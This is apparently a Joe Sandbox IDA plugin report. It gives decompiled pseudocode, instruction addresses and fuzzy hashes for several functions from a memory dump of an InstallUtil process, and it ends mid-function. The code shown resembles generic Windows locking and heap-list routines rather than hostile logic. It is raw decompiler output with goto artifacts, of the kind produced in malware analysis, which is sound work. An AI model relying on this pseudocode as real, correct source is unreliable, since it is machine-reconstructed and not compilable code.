0x012edc8f
0x012edc92
0x012edc99
0x012edc9f
0x012edca5
0x012edcaa
0x012edcaa
0x012edcb3
0x012edcb8
0x012edcbb
0x012edcc1
0x012edccf
0x012edcd2
0x012edcd5
0x012edcd7
0x012edcda
0x012edcdc
0x012edcdc
0x012edce2
0x012edce4
0x00000000
0x012edce4

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bbd2430c6cb495fedba160dc3576b64647016c38e62c2a759b6eccb6d298e2c
Instruction ID: 762e56e8f8f11abf392ad492455443812dbd5b0aaed512a43c1a5567b34a4511
Opcode Fuzzy Hash: 8bbd2430c6cb495fedba160dc3576b64647016c38e62c2a759b6eccb6d298e2c
Instruction Fuzzy Hash: 9E51B072E1020ACFCB15CFACC494AAEFBF5BF48350F64815AD659A7340EB71A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012DEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E012DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E012C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E012C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x012def4b
0x012def4d
0x012def57
0x012df0bd
0x012df0c2
0x012df0d2
0x012df0d2
0x012df0c2
0x012def5d
0x012def5f
0x012def67
0x012def6a
0x012def6d
0x012def74
0x012def7f
0x012def82
0x012def82
0x012def86
0x012def88
0x012def8c
0x012def8f
0x012def8f
0x012def8f
0x00000000
0x012def91
0x012def93
0x012defc4
0x012defc4
0x012defc4
0x012defca
0x012defd0
0x012df0a6
0x00000000
0x00000000
0x012df0af
0x0132bb06
0x0132bb0a
0x012df0b5
0x012df0b5
0x012df0b5
0x012df0b5
0x00000000
0x012defd6
0x012defd9
0x012df0de
0x012df0e2
0x012defdf
0x012defdf
0x012defdf
0x012defe5
0x0132bafc
0x0132bafc
0x012defe5
0x012defeb
0x012defed
0x012df00f
0x012df011
0x012df01a
0x012df01d
0x012df021
0x012df028
0x012df029
0x012df029
0x012df02c
0x00000000
0x012df02c
0x012deff3
0x012deff9
0x012df0ea
0x012df0ed
0x012df0ef
0x00000000
0x012df0ef
0x012df003
0x0132bb12
0x012df045
0x012df049
0x012df051
0x012df09e
0x012df0a0
0x012df0a0
0x012df09e
0x012df053
0x012df064
0x012df064
0x012df06b
0x0132bb1a
0x0132bb1a
0x012df071
0x012df071
0x012df07d
0x012df082
0x012df08f
0x012df08f
0x012df009
0x012df00d
0x00000000
0x012df00d
0x012defd0
0x012def97
0x012defa5
0x012defaa
0x00000000
0x012defac
0x012defac
0x012defac
0x00000000
0x012defb2
0x012df036
0x012df03a
0x012df040
0x012df090
0x00000000
0x012df092
0x012df042
0x00000000
0x012df042
0x012defb7
0x012defb9
0x012defbc
0x012defb0
0x012defb0
0x00000000
0x012defbe
0x012defbe
0x012defc1
0x00000000
0x012defc1
0x012defbc
0x012defaa
0x012def91

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: cc4c19f7220b2bffd12d0626ffc9a415387ded2641aa66b1f34ad7edc950dc92
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 5D511530E24246DFEB21CB6CC1C17AEFBB1AF05314F1881E8C6565B286C3B5A98AC751

Uniqueness

Uniqueness Score: -1.00%

Function 0139740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0139740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0131D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0130F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L012E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L012E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0130F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L012E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0139740d
0x0139740d
0x01397412
0x01397413
0x01397416
0x01397418
0x0139741c
0x0139741f
0x01397422
0x01397422
0x01397428
0x0139742a
0x0139742a
0x01397451
0x01397432
0x0139744f
0x0139744f
0x00000000
0x01397434
0x01397438
0x01397443
0x01397517
0x01397517
0x0139751a
0x01397535
0x01397520
0x01397527
0x0139752c
0x01397531
0x01397533
0x00000000
0x01397533
0x00000000
0x01397531
0x0139754b
0x0139754f
0x0139755c
0x0139755c
0x0139755f
0x01397560
0x01397561
0x01397562
0x01397563
0x01397568
0x0139756a
0x0139756c
0x0139756d
0x0139756d
0x0139756f
0x01397572
0x01397574
0x01397577
0x0139757c
0x0139757f
0x00000000
0x01397551
0x01397551
0x01397551
0x01397553
0x01397553
0x01397449
0x01397449
0x0139744c
0x0139744c
0x00000000
0x0139744c
0x01397443
0x0139750e
0x01397514
0x01397514
0x01397455
0x01397469
0x0139746d
0x00000000
0x01397473
0x01397473
0x01397476
0x01397480
0x01397484
0x0139748e
0x01397493
0x01397493
0x01397496
0x01397499
0x013974a1
0x013974b1
0x013974b5
0x00000000
0x013974bb
0x013974c1
0x013974c1
0x013974c4
0x013974c5
0x013974c6
0x013974c7
0x013974c8
0x013974cd
0x00000000
0x013974d3
0x013974d3
0x013974d6
0x013974d8
0x013974db
0x013974dd
0x013974e0
0x013974e7
0x013974ee
0x013974ee
0x013974f4
0x013974f9
0x00000000
0x013974fb
0x013974fb
0x013974fd
0x01397500
0x01397503
0x01397505
0x01397505
0x013974f9
0x00000000
0x013974cd
0x013974b5
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 1f2cc733e7bde21adeb8d218c1e6fe07898ff091c0befe943952974c84b868a2
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: C8516C71610646EFDB26CF18C480A56BBF5FF45308F1480AAE9089F252E771E946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012F2990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E012F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x139ff00);
				E0131D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x12a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0130E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x12a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E013451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x12a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E012F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E012D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E012F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E012F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E012F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E012F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0131D0D1(_t62);
				goto L28;
			}

0x012f2990
0x012f2992
0x012f2997
0x012f29a3
0x012f29a6
0x012f29ab
0x012f29ad
0x012f29b2
0x01335c80
0x012f29b8
0x012f29b8
0x012f29bb
0x012f29c0
0x012f29c5
0x012f29c6
0x012f29c6
0x012f29cb
0x00000000
0x00000000
0x012f29cd
0x012f29d0
0x012f29d9
0x012f29db
0x012f29dd
0x012f2a7f
0x012f2a84
0x012f2a87
0x012f2a89
0x01335ca1
0x01335ca3
0x00000000
0x012f2a8f
0x012f2a8f
0x00000000
0x012f2a8f
0x00000000
0x012f29e3
0x012f29e3
0x012f29e3
0x00000000
0x012f29e3
0x012f29dd
0x00000000
0x012f29db
0x012f29e6
0x012f29e9
0x012f29eb
0x012f29ed
0x012f29f3
0x012f29f5
0x012f29f8
0x012f29fa
0x012f2a97
0x012f2a9a
0x012f2a9d
0x012f2add
0x00000000
0x012f2a9f
0x012f2aa2
0x012f2aa5
0x012f2aa8
0x012f2aab
0x01335cab
0x01335caf
0x01335cc5
0x01335cda
0x01335cdc
0x01335cdf
0x01335ce5
0x00000000
0x01335ceb
0x01335ced
0x01335cee
0x00000000
0x01335cee
0x01335cb1
0x01335cb4
0x01335cb9
0x01335cbb
0x00000000
0x01335cbd
0x01335cbd
0x00000000
0x01335cbd
0x01335cbb
0x012f2ab1
0x012f2ab1
0x012f2ac4
0x012f2ac6
0x012f2ac6
0x00000000
0x012f2ac6
0x012f2aab
0x00000000
0x012f2a00
0x012f2a09
0x012f2a0e
0x012f2a21
0x012f2a24
0x012f2a35
0x012f2a3a
0x012f2a3d
0x012f2a42
0x012f2a59
0x012f2a59
0x012f2a5c
0x012f2a5f
0x012f2a5f
0x012f29fa
0x012f29f3
0x012f2a64
0x012f2a64
0x012f2a6b
0x012f2a6b
0x012f2a6d
0x012f2a72
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed84ab65abfa2802fcc0340dd9cfae695f170dcf0bd3491f45b750a9f8aab66
Instruction ID: 429636a3b9f79ee4aa20bdc779d7fedb8ae0a623ee77057a33a054b3be7a3809
Opcode Fuzzy Hash: 7ed84ab65abfa2802fcc0340dd9cfae695f170dcf0bd3491f45b750a9f8aab66
Instruction Fuzzy Hash: 33517B7191021ADFDF26CF99C880AEEBBB5BF49354F158129EA10AB350C375D952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 012F4BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E012F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x13bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E012CCC50(_t86);
					L11:
					return E0130B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x13b8504
				E012E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0130FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0130B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L012E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E012CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x13b8504
								E012DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E012F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x012f4bad
0x012f4bbf
0x012f4bc2
0x012f4bc6
0x012f4bcd
0x012f4bd9
0x013367fe
0x01336800
0x012f4ccc
0x012f4ccd
0x012f4cb7
0x012f4cc9
0x012f4cc9
0x012f4bdf
0x012f4be5
0x00000000
0x00000000
0x012f4beb
0x012f4bef
0x00000000
0x00000000
0x012f4bf5
0x012f4bf9
0x012f4c06
0x012f4c0b
0x012f4c17
0x012f4c1c
0x012f4c1f
0x012f4c25
0x012f4c33
0x012f4c3d
0x012f4c40
0x012f4c43
0x012f4c47
0x012f4c4d
0x012f4c53
0x012f4c54
0x012f4c55
0x012f4c56
0x012f4c5b
0x012f4c5c
0x012f4c63
0x012f4c6b
0x00000000
0x00000000
0x01336776
0x01336784
0x01336784
0x0133679f
0x013367a7
0x013367af
0x013367ce
0x00000000
0x013367b1
0x013367b7
0x013367b8
0x013367c1
0x013367d3
0x013367d9
0x013367dd
0x012f4c94
0x012f4c94
0x012f4c98
0x012f4c9c
0x012f4ca3
0x013367f4
0x013367f4
0x012f4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x012f4cb5
0x012f4c79
0x012f4c7e
0x012f4c89
0x012f4c8b
0x012f4c8f
0x012f4c8f
0x00000000
0x012f4c89
0x013367c3
0x00000000
0x013367c3
0x013367af
0x012f4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b89bb0f10ad76b3415b324047e7a02c452d4966471f5619135c57360f74c1a18
Instruction ID: 52861e5d22361dcc058e0ff94d85fb6842a6f7cb0df89416515382a2732e2f18
Opcode Fuzzy Hash: b89bb0f10ad76b3415b324047e7a02c452d4966471f5619135c57360f74c1a18
Instruction Fuzzy Hash: 2641C875A10259AFDB21EF68C941FEAB7F4EF45700F4100A9EA08AB251D774DE80CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012F4D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x13bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0130FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x13b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0130B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L012E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E012CCCC0(_t42);
